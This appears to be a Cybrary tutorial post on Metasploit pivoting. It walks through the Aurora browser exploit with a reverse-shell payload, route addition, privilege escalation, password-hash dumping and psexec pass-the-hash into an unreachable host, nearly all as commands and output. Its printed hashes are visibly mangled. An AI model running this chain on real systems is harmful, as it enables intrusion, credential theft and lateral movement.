Metasploit: Routing Traffic from a Non-Routable Network

July 14, 2015 | Views: 8158

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

According to Offensive-Security:

Pivoting is the unique technique of using an instance (also referred to as a ‘plant’ or ‘foothold’) to be able to “move” around inside a network. Basically using the first compromise to allow and even aid in the compromise of other otherwise inaccessible systems.

In this scenario, we’ll be using it for routing traffic from a normally non-routable network.

 

For this, we’ll use exploit “exploit/windows/browser/ms10_002_aurora

msf > use exploit/windows/browser/ms10_002_aurora 
we need to set URIPATH with LHOST
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx

 

With a lookup on sessions, we have:

msf exploit(ms10_002_aurora) > sessions -l
Now we need subnet mask and route discovery 
for that 

meterpreter > run autoroute -h
[*] Usage:   run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]   run autoroute -s xx.x.x.x -n 255.255.255.0  # Add a route to x.x.x.x/255.255.255.0
[*]   run autoroute -s x.x.x.x                 # Netmask defaults to 255.255.255.0
[*]   run autoroute -s x.x.x.x/24              # CIDR notation is also okay
[*]   run autoroute -p                         # Print active routing table
[*]   run autoroute -d -s x.x.x.x              # Deletes the x.x.x.x/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
meterpreter > run autoroute -s x.x.x.x/24
[*] Adding a route to x.x.x.x/255.255.255.0...
[+] Added route to x.x.x.x/255.255.255.0 via 192.168.1.0
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   x.x.x.x          255.255.255.0      Session 1

 

Why did I do this? We need to route and act like that IP in the step session. Try typing ifconfig and you’ll see your victim in your route. We need to use that IP, so I’ve routed that with subnet masks.

Now, we need to access that system, too. Let’s get it by typing getsytem and exploit with the pass the hash method recently explained.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c2ec80f879c1123b5dc8d24f1xxe2c37a45...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:81cbcea8a9af9as3bbaad3b435b51404ee:561cbdae13dded5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3sd435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9a6ae26408b0629ddc621c90c897b42d:07a59dbe14e2ea9c4792e2f189e2de3a:::
SUPPORT_s388945a0:1002:aad3b435b51404eeaad3b435b51das404ee:ebf9fa44b3204029db5a8a77f5350160:::
Thinker:1004:81casbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5aasbd30aa94ddeb3cf52d:::

We need to bind_tcp over the network. For that, we can use TCP exploit in meterpreter.

msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > show options

Module options:

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   FILTER                        no        The filter string for capturing traffic
   INTERFACE                     no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target address range or CIDR identifier
   SNAPLEN      65535            yes       The number of bytes to capture
   THREADS      1                yes       The number of concurrent threads
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds
   VERBOSE      false            no        Display verbose output

msf auxiliary(tcp) > set RHOSTS x.x.x.x/24
RHOST => x.x.x.x/24
msf auxiliary(tcp) > set PORTS 179,445
PORTS => 179,445
msf auxiliary(tcp) > set THREADS 20
THREADS => 20
msf auxiliary(tcp) > run


[*] x.x.x.x:445 - TCP OPEN

Follow the steps to pass the hash and tcp_bind for pivoting:

msf auxiliary(tcp) > use exploit/windows/smb/psexec 
msf exploit(psexec) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(psexec) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
SMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to x.x.x.x:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created qANuICKyR.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:x.x.x.x[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (UOtrbJMd - "AuiSy")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting ssWSdV.exe...
[*] Sending stage (749056 bytes)
[*] Meterpreter session 2 opened (192.168.1.0-192.168.1.255:0 -> x.x.x.x:4444) at Mon Jul 11 12:56:42 -0700 2015

 

Voila! We’ve done it. Just type ipconfig to see that we are using our victim’s connection and are connected to that system that wasn’t normally connected (it was not on a LAN or any other connection ).

 

— Multi Thinker

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
6 Comments
  1. Can you please share pivoting techniques with lab scenario without using metasploit. How to do manual pivoting?

Page 2 of 2«12
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 332 / December 14, 2019
How do I Get MTA Certified?
Views: 924 / December 12, 2019
How much does your PAM software really cost?
Views: 1377 / December 10, 2019
How Do I Get into Android Development?
Views: 1755 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel